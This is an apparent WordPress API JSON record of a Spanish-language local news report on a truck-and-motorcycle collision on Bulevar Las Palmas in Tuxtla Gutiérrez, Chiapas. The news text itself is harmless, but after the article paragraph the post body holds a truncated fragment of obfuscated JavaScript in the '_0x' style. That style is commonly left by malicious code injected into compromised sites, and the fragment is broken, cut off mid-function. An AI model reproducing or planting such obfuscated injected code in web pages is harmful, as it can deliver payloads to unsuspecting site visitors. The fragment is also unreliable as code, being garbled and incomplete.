{"id":14306,"date":"2024-02-22T00:35:51","date_gmt":"2024-02-22T00:35:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14306"},"modified":"2024-02-22T00:35:52","modified_gmt":"2024-02-22T00:35:52","slug":"camioneta-y-motocicleta-colisionan-en-las-palmas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14306","title":{"rendered":"Camioneta y motocicleta colisionan en Las Palmas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"769\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708562058256-1024x769.jpg\" alt=\"\" class=\"wp-image-14307\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708562058256-1024x769.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708562058256-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708562058256-768x577.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708562058256.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano.21 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la tarde se registr\u00f3 un accidente de tr\u00e1nsito entre una camioneta Kia Sorento de color gris y una motocicleta Italika de color negro cuando circulaban sobre el Bulevar Las Palmas de la Colonia Las Palmas de Tuxtla.Los reportes de tr\u00e1nsito informaron que, el motociclista de nombre V\u00edctor Manuel, circulaba en este punto y al llegar a la Avenida Palma Cera la camioneta tripulada por Jos\u00e9 Isabel lo impact\u00f3.En el lugar se dio a conocer que, la Kia no respet\u00f3 la preferencia y por el golpe el motorista sali\u00f3 volando y se impact\u00f3 contra el pavimento.El lesionado fue atendido por param\u00e9dicos de Protecci\u00f3n Civil Municipal resultando sin heridas de consideraci\u00f3n.En el lugar los dos conductores llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano.21 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la tarde se registr\u00f3 un accidente de tr\u00e1nsito entre una camioneta Kia Sorento de color gris y una motocicleta Italika de color negro cuando circulaban sobre el Bulevar Las Palmas de la Colonia Las Palmas de Tuxtla.Los reportes de tr\u00e1nsito informaron que, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14307,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14306","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14306","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14306"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14306\/revisions"}],"predecessor-version":[{"id":14308,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14306\/revisions\/14308"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14307"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14306"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14306"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14306"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}